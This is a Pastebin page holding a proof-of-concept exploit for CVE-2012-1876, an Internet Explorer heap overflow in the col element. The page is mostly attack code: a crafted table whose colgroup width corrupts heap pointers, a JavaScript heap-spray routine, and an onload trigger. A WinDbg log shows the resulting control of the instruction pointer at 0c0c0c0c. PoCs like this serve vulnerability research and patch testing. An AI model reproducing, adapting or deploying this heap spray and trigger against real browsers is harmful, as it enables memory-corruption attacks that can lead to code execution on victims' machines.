Guest User

CVE-2012-1876 PoC

a guest
Jul 8th, 2012
1,413
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <head>
  3. <title>CVE-2012-1876 PoC</title>
  4. </head>
  5. <body onload="_crash()">
  6. <TABLE style="table-layout: fixed;">
  7.     <colgroup id="cg" width="2021161">
  8.     <col id="cl" span="2">
  9.     <col>
  10.     </colgroup>
  11.     <TR>
  12.         <TD>XXXX</TD>
  13.     </TR>
  14. </TABLE>
  15. <script>
  16. /*******
  17. CVE-2012-1876 IE col element heap overflow PoC
  18. Canberk Bolat - cbolat.blogspot.com
  19.  
  20. cg's width = 2021161 (2021161 * 100 = 0c0c0c04) (Blink->Flink = cg's width)
  21.  
  22. (1014.1158): Access violation - code c0000005 (first chance)
  23. First chance exceptions are reported before any exception handling.
  24. This exception may be expected and handled.
  25. eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
  26. eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0         nv up ei pl nz na po nc
  27. cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
  28. 0c0c0c0c 0c0c            or      al,0Ch
  29. 1:019> !heap -x 0c0c0c0c
  30. List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
  31. HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted
  32.  
  33. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
  34. HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted
  35.  
  36. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
  37. HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted
  38.  
  39. ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
  40. HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
  41. **********/
  42.  
  43. var targetObj = document.getElementById("cl");
  44.  
  45. function spray() {
  46.     for(S="\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=["\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c" + S.substr(60) +"\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141"].join("")
  47. }
  48.  
  49. function _crash() {
  50. spray();
  51. //alert("OK");
  52. targetObj.chOff = 10;
  53. targetObj.span = 400;
  54. }
  55. </script>  
  56. </body>
  57. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×